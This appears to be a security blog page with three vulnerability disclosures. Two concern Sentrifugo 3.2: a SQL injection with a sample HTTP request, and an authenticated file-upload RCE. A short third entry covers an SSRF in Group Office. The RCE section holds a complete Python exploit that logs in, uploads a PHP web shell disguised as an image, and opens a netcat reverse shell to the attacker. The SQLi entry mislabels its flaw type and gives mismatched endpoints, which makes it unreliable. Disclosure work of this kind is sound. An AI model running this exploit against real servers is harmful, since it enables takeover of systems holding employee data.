Sentrifugo Version 3.2 –> SQLi [employeeNumId] parameter | CVE-2020-26805

Software: https://sourceforge.net/projects/sentrifugo/Version: 3.2 Vulnerability: Unrestricted File UploadCVE: CVE-2020-26805
Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs…Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In Sentrifugo web application, admin can edit employee’s informations via this endpoint –> sentrifugo/index.php/empadditionaldetails/edit/userid/2. In this POST request, employeeNumId parameter is affected by SQLi vulnerability. Attacker can inject SQL commands into query, read data from database or write data into the database. If you send the below request, you will get the response approximately 5 seconds after because of the SLEEP command.POST /sentrifugo/index.php/employee/edit/id/2 HTTP/1.1Host: 192.168.1.6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 421Origin: http://192.168.1.6Connection: closeReferer: http://192.168.1.6/sentrifugo/index.php/employee/edit/id/2Cookie: PHPSESSID=4p9aptkj3tg0kp675mtaf9d02vUpgrade-Insecure-Requests: 1

Sentrifugo Version 3.2 –> RCE [Authenticated] (assets) | CVE-2020-26803

Software: https://sourceforge.net/projects/sentrifugo/Version: 3.2 Vulnerability: Unrestricted File UploadCVE: CVE-2020-26803Exploit-DB: https://www.exploit-db.com/exploits/48997
Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs…Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.
Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In Sentrifugo web application, users can upload an image under “Assets -> Add” tab.  This “Upload Images” functionality is suffered from “Unrestricted File Upload” vulnerability so attacker can upload malicious files using this functionality and control the server.

I wrote an exploit to demonstrate the vulnerability. You need to change hardcoded values before running the exploit.

Exploit:import requestsfrom bs4 import BeautifulSoupfrom ast import literal_eval
”’You should change the below hardcoded inputs to get a reverse shell.”’
login_url = “http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave”upload_url = “http://XXX.XXX.XXX.XXX/sentrifugo/index.php/assets/assets/uploadsave”call_shell = “http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/assets_images_temp/”username = “xxxx”password = “xxxx”
attacker_ip = “XXX.XXX.XXX.XXX”listener_port = “4444”
# Set proxy for debugging purposes
proxy = {“http”: “http://XXX.XXX.XXX.XXX:8080”}
# Log in to the system
session = requests.Session()request = session.get(login_url)body = {“username”:username,”password”:password}# session.post(login_url, data=body, proxies=proxy) session.post(login_url, data=body) # Send a request without proxyprint(“Logged in to the application..”)
# Upload the PHP shellfiles = [    (‘myfile’,         (‘shell.php’,        ‘<?php system(\’nc.traditional {} {} -e /bin/bash\’); ?>’.format(attacker_ip,listener_port),        ‘image/jpeg’)    )]# r = session.post(upload_url, files=files, proxies=proxy)r = session.post(upload_url, files=files) # Send a request without proxyresponse = r.contentdict_str = response.decode(“UTF-8”)response = literal_eval(dict_str) # Convert bytes to dictionaryfilename = response[“filedata”][“new_name”]url = call_shell + filenameprint(“PHP file is uploaded –> {}”.format(url))
# Trigger the shell
session.get(url)

Group Office CRM | SSRF

Software: https://sourceforge.net/projects/group-office/

Version: 6.4.196

Vulnerability: SSRF

CVE: N/A

Description of the product:

Group Office is an open source groupware application. It makes your daily office tasks easier. Share projects, calendars, files and e-mail online. It is a complete solution for all your online office needs. From a customer phone call to a project and finally an invoice. The support system helps to keep your customers happy.

Group Office is fast, secure and has privacy by design. You can stay in full control of your data by self hosting your cloud and e-mail.

Our document editing solution keeps all data on the secured server instead of synchronising it to all user devices.

GroupOffice is open source and modular. Which means it’s easy to customise and extend. You can turn off and on features and it enables any developer to create new modules for the platform.

Description of the vulnerability:

A Server-Side Request Forgery (SSRF) vulnerability in the “set image from url” allows a remote attacker to forge GET requests to arbitrary URLs.